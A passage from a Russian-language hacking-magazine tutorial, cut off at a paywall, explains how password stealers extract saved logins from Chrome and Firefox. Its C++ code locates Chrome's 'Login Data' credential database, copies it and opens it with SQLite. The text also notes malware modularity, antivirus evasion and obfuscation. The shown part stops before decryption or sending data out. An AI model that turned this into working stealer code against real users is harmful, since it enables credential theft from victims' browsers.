Ты наверняка слышал о таком классе зловредных приложений, как стилеры. Их задача — вытащить из системы жертвы ценные данные, в первую очередь — пароли. В этой статье я расскажу, как именно они это делают, на примере извлечения паролей из браузеров Chrome и Firefox и покажу примеры кода на C++.

WARNING

Весь код в статье приводится исключительно в образовательных целях и для восстановления собственных утерянных паролей. Похищение чужих учетных или других личных данных без надлежащего письменного соглашения карается по закону.

Итак, браузеры, в основе которых лежит Chrome или Firefox, хранят логины и пароли пользователей в зашифрованном виде в базе SQLite. Эта СУБД компактна и распространяется бесплатно по свободной лицензии. Так же, как и рассматриваемые нами браузеры: весь их код открыт и хорошо документирован, что, несомненно, поможет нам.

В примере модуля стилинга, который я приведу в статье, будет активно использоваться CRT и другие сторонние библиотеки и зависимости, типа sqlite.h. Если тебе нужен компактный код без зависимостей, придется его немного переработать, избавившись от некоторых функций и настроив компилятор должным образом. Как это сделать, я показывал в статье «Тайный WinAPI. Как обфусцировать вызовы WinAPI в своем приложении».

 

Что скажет антивирус?

Рекламируя свои продукты, вирусописатели часто обращают внимание потенциальных покупателей на то, что в данный момент их стилер не «палится» антивирусом.

Тут надо понимать, что все современные и более-менее серьезные вирусы и трояны имеют модульную структуру, каждый модуль в которой отвечает за что-то свое: один модуль собирает пароли, второй препятствует отладке и эмуляции, третий определяет факт работы в виртуальной машине, четвертый проводит обфускацию вызовов WinAPI, пятый разбирается со встроенным в ОС файрволом.

Так что судить о том, «палится» определенный метод антивирусом или нет, можно, только если речь идет о законченном «боевом» приложении, а не по отдельному модулю.

 

Chrome

Начнем с Chrome. Для начала давай получим файл, где хранятся учетные записи и пароли пользователей. В Windows он лежит по такому адресу:

C:\Users\%username%\AppData\Local\Google\Chrome\UserData\Default\Login Data

Чтобы совершать какие-то манипуляции с этим файлом, нужно либо убить все процессы браузера, что будет бросаться в глаза, либо куда-то скопировать файл базы и уже после этого начинать работать с ним.

Давай напишем функцию, которая получает путь к базе паролей Chrome. В качестве аргумента ей будет передаваться массив символов с результатом ее работы (то есть массив будет содержать путь к файлу паролей Chrome).

#define CHROME_DB_PATH  "\\Google\\Chrome\\User Data\\Default\\Login Data"

bool get_browser_path(char * db_loc, int browser_family, const char * location) {
    memset(db_loc, 0, MAX_PATH);
    if (!SUCCEEDED(SHGetFolderPath(NULL, CSIDL_LOCAL_APPDATA, NULL, 0, db_loc))) {
        return 0;
    }

    if (browser_family == 0) {
        lstrcat(db_loc, TEXT(location));
        return 1;
    }
}

Вызов функции:

char browser_db[MAX_PATH];
get_browser_path(browser_db, 0, CHROME_DB_PATH);

Давай вкратце поясню, что здесь происходит. Мы сразу пишем эту функцию, подразумевая будущее расширение. Один из ее аргументов — поле browser_family, оно будет сигнализировать о семействе браузеров, базу данных которых мы получаем (то есть браузеры на основе Chrome или Firefox).

Если условие browser_family == 0 выполняется, то получаем базу паролей браузера на основе Chrome, если browser_family == 1 — Firefox. Идентификатор CHROME_DB_PATH указывает на базу паролей Chrome. Далее мы получаем путь к базе при помощи функции SHGetFolderPath, передавая ей в качестве аргумента CSIDL значение CSIDL_LOCAL_APPDATA, которое означает:

#define CSIDL_LOCAL_APPDATA 0x001c // <user name>\Local Settings\Applicaiton Data (non roaming)

Функция SHGetFolderPath устарела, и в Microsoft рекомендуют использовать вместо нее SHGetKnownFolderPath. Проблема в том, что поддержка этой функции начинается с Windows Vista, поэтому я применил ее более старый аналог для сохранения обратной совместимости. Вот ее прототип:

HRESULT SHGetFolderPath(      
    HWND hwndOwner,
    int nFolder,
    HANDLE hToken,
    DWORD dwFlags,
    LPTSTR pszPath
);

После этого функция lstrcat совмещает результат работы SHGetFolderPath с идентификатором CHROME_DB_PATH.

База паролей получена, теперь приступаем к работе с ней. Как я уже говорил, это база данных SQLite, работать с ней удобно через SQLite API, которые подключаются с заголовочным файлом sqlite3.h. Давай скопируем файл базы данных, чтобы не занимать его и не мешать работе браузера.

int status = CopyFile(browser_db, TEXT(".\\db_tmp"), FALSE);
if (!status) {
    // return 0;
}

Теперь подключаемся к базе командой sqlite3_open_v2. Ее прототип:

int sqlite3_open_v2(
    const char *filename,   /* Database filename (UTF-8) */
    sqlite3 **ppDb,         /* OUT: SQLite db handle */
    int flags,              /* Flags */
    const char *zVfs        /* Name of VFS module to use */
);

Первый аргумент — наша база данных; информация о подключении возвращается во второй аргумент, дальше идут флаги открытия, а четвертый аргумент определяет интерфейс операционной системы, который должен использовать это подключение к базе данных, в нашем случае он не нужен. Если эта функция отработает корректно, возвращается значение SQLITE_OK, в противном случае возвращается код ошибки.

sqlite3 *sql_browser_db = NULL;

status = sqlite3_open_v2(TEMP_DB_PATH, 
                &sql_browser_db, 
                SQLITE_OPEN_READONLY, 
                NULL);
if(status != SQLITE_OK) {
    sqlite3_close(sql_browser_db);
    DeleteFile(TEXT(TEMP_DB_PATH));
}

INFO

Обрати внимание: при некорректной отработке функции нам все равно необходимо самостоятельно закрыть подключение к базе и удалить ее копию.

Теперь начинаем непосредственно обрабатывать данные в базе. Для этого воспользуемся функцией sqlite3_exec().

Продолжение доступно только подписчикам

Материалы из последних выпусков можно покупать отдельно только через два месяца после публикации. Чтобы продолжить чтение, необходимо купить подписку.

Подпишись на «Хакер» по выгодной цене!

Подписка позволит тебе в течение указанного срока читать ВСЕ платные материалы сайта. Мы принимаем оплату банковскими картами, электронными деньгами и переводами со счетов мобильных операторов. Подробнее о подписке

Оставить мнение

Check Also

Мифы об аде. Как и зачем программировать на аде в современном мире

Язык, разработанный по заказу Министерства обороны США и названный в честь первой в мире п…